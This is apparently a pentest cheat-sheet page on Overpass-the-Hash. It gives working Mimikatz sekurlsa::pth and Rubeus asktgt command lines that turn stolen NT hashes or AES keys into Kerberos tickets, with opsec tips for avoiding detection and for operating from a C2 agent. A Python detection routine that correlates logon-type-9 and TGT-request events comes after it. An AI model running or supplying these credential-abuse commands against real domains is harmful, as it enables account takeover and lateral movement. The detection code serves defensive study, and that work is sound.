Overpass-the-Hash

Mimikatz

Create a new process with dummy creds (Logon type 9), open the LSASS process and patch it with the supplied NT hash. This causes the normal Kerberos authentication process to kick off as if the user had logged on normally, turning the supplied hash into a fully-fledged TGT:

Cmd > .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::pth /user:snovvcrash /domain:megacorp.local /run:c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /ntlm:fc525c9683e8fe067095ba2ddc971889" "exit"

It also works for local accounts, but because patching LSASS does not change the security information or user information for the process, the new credentials in LSASS can correctly be used only for network authentication and not for identifying the local user account associated with the process. (paraphrased from here)

That is why, for local accounts, options such as net use \\localhost\c$, WMI calls or PsExec can be considered.

Rubeus

Create a sacrificial process (Logon type 9), legitimately ask Kerberos for a TGT, import it into that process and interact with the process (requires an elevated context):

Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /password:Passw0rd! /createnetonly:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /show
Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /rc4:fc525c9683e8fe067095ba2ddc971889 /createnetonly:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /show

If operating Rubeus from a C2 agent, you can use steal_token instead of the /show option.

Create a new process with dummy creds (Logon type 9) manually, then use Rubeus with the user's NT hash to ask for a TGT and import it:

Cmd > runas /netonly /user:megacorp.local\snovvcrash cmd
Enter the password for megacorp.local\snovvcrash: dummy_Passw0rd!
Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt

A more opsec-safe approach is to use an AES key (KeyType 0x12) instead of RC4-HMAC (KeyType 0x17), together with the /opsec switch, which instructs Rubeus not to do pre-auth (mimicking standard Kerberos behavior):

Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /aes256:94b4d075fd15ba856b4b7f6a13f76133f5f5ffc280685518cad6f732302ce9ac /ptt /opsec
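As an added defender's example (not from the original notes or from the Mimikatz/Rubeus projects), the following Python correlates the two traces the techniques above leave behind: a 4624 NewCredentials (Logon type 9) logon on the workstation and a 4768 TGT request whose encryption type shows whether an NT hash (0x17) or an AES key (0x12) was used. Event IDs 4624/4768 and the field names are the standard Windows Security log ones; the host names, addresses and timestamps are constructed.

```python
"""Correlate Windows Security events to spot Overpass-the-Hash.
Event dicts are simplified; all sample data below is constructed. Signals:
  * 4624 LogonType 9 (NewCredentials): runas /netonly, sekurlsa::pth and
    Rubeus /createnetonly all produce one, so alone it is only a weak hint.
  * 4768 with TicketEncryptionType 0x17 (RC4-HMAC): a TGT obtained with an
    NT hash. The /aes256 /opsec variant yields 0x12 instead, so an AES
    request right after a type-9 logon is still worth triage (low severity).
"""
from datetime import datetime, timedelta

RC4_HMAC, AES256 = "0x17", "0x12"
WINDOW = timedelta(minutes=5)


def correlate(events, window=WINDOW):
    """Return (severity, user, detail) alerts, joining 4624 and 4768 by user."""
    events = sorted(events, key=lambda e: datetime.fromisoformat(e["TimeCreated"]))
    netonly = {}  # user -> (time, workstation) of the latest LogonType 9 logon
    alerts = []
    for e in events:
        t = datetime.fromisoformat(e["TimeCreated"])
        user = e["TargetUserName"].lower()
        if e["EventID"] == 4624 and e.get("LogonType") == 9:
            netonly[user] = (t, e["Computer"])
        elif e["EventID"] == 4768:
            enc = e.get("TicketEncryptionType")
            prior = netonly.get(user)
            recent = prior is not None and t - prior[0] <= window
            detail = f"TGT enc {enc} requested from {e['IpAddress']}"
            if recent:
                detail += f" within {window} of NewCredentials logon on {prior[1]}"
            if recent and enc == RC4_HMAC:
                alerts.append(("high", user, detail))
            elif enc == RC4_HMAC:  # RC4 alone: review it in an AES-only domain
                alerts.append(("medium", user, detail))
            elif recent:
                alerts.append(("low", user, detail))
    return alerts


# Constructed sample: a NewCredentials logon on WS01, then an RC4 TGT request
# for the same user from WS01's address, then an unrelated AES TGT request.
SAMPLE = [
    {"EventID": 4624, "TimeCreated": "2024-05-01T09:00:00", "Computer": "WS01",
     "TargetUserName": "snovvcrash", "LogonType": 9},
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:00:20", "TargetUserName":
     "snovvcrash", "IpAddress": "10.0.0.5", "TicketEncryptionType": RC4_HMAC},
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:01:30", "TargetUserName":
     "alice", "IpAddress": "10.0.0.7", "TicketEncryptionType": AES256},
]
```

With the /aes256 /opsec variant only the low-severity branch fires, which is why the type-9 logon itself belongs in the baseline rather than being ignored as noise.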
